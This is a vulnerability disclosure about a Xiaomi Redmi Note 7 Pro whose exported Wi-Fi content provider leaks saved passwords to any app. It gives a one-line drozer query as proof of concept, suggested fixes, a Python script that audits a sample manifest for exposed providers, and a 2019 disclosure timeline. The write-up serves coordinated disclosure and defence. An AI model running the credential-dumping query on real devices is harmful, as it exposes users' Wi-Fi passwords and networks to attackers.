Disclosing wifi password via content provider injection in Xiaomi

Summary:

Saved Wi-Fi passwords on Android are stored in the /data/misc/wifi directory, which can only be accessed with root access. In general, you cannot list or read the /data directory unless you have root access or the files are world-readable or world-writable.

Device used:

(Xiaomi Redmi Note 7 Pro, Android 9)

➜ appreview adb shell getprop | grep -E "ro.miui.region|ro.build.fingerprint"
[ro.build.fingerprint]: [xiaomi/violet/violet:9/PKQ1.181203.001/V10.3.13.0.PFHINXM:user/release-keys]
[ro.miui.region]: [IN]

Poc steps:

Connect the device and run the drozer command below. It dumps the Wi-Fi passwords, along with other details, in cleartext.

run app.provider.query content://wifi/wifi

Fix:

Don’t export the content provider containing user information.
Protect it via custom permissions.

Or store it in encrypted format.
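
A check for the first two fixes above, added here as an example (not code from the original report or from Xiaomi): it parses a text-form AndroidManifest.xml and lists providers that other apps may be able to read. The manifest, package, permission and authority names are constructed, and the default for a missing android:exported attribute is taken from targetSdkVersion as an assumption about platform behaviour.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"

# Constructed sample manifest: package, permissions and authorities are hypothetical.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.settings">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="28"/>
  <permission android:name="com.example.READ_NET" android:protectionLevel="normal"/>
  <permission android:name="com.example.READ_CFG" android:protectionLevel="signature"/>
  <application>
    <provider android:name=".OpenProvider" android:authorities="example.open"
        android:exported="true"/>
    <provider android:name=".WeakProvider" android:authorities="example.weak"
        android:exported="true" android:readPermission="com.example.READ_NET"/>
    <provider android:name=".SigProvider" android:authorities="example.sig"
        android:exported="true" android:readPermission="com.example.READ_CFG"/>
    <provider android:name=".PrivateProvider" android:authorities="example.private"/>
  </application>
</manifest>"""


def audit_providers(manifest_xml):
    """Return (authorities, reason) for each provider other apps may be able to read."""
    root = ET.fromstring(manifest_xml.strip())
    sdk = root.find("uses-sdk")
    attrs = sdk.attrib if sdk is not None else {}
    target = int(attrs.get(NS + "targetSdkVersion") or attrs.get(NS + "minSdkVersion") or 1)
    # Assumption: with no android:exported, a provider is exported only below target SDK 17.
    default_exported = target < 17
    # Protection level of each permission declared here ("normal" when omitted).
    levels = {p.get(NS + "name"): p.get(NS + "protectionLevel", "normal")
              for p in root.findall("permission")}
    findings = []
    for prov in root.iter("provider"):
        exported = prov.get(NS + "exported", str(default_exported).lower())
        if exported != "true":
            continue
        # readPermission overrides the general permission attribute for queries.
        perm = prov.get(NS + "readPermission") or prov.get(NS + "permission")
        auth = prov.get(NS + "authorities")
        if perm is None:
            findings.append((auth, "exported without a read permission"))
        elif perm in levels and "signature" not in levels[perm]:
            # Any app can request a normal-level permission; report for review.
            findings.append((auth, f"{perm} is {levels[perm]}-level"))
    return findings
```

Calling audit_providers(SAMPLE_MANIFEST) reports the provider with no permission and the one guarded only by a normal-level custom permission; the signature-protected and non-exported providers pass.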

Impact

Any app on the device can query the provider and fetch the Wi-Fi credentials. By default the system does not permit this, because accessing the stored passwords requires a rooted device, but here they are easily available. A malicious app can use them to log in to the victim's router and can also alter the DNS settings, which discloses the user's browsing activity to the attacker.

Disclosure Timeline

Reported on Jul 18th 2019
Triaged on Jul 18th 2019
Fix reviewed and ticket closure on Sep 11th 2019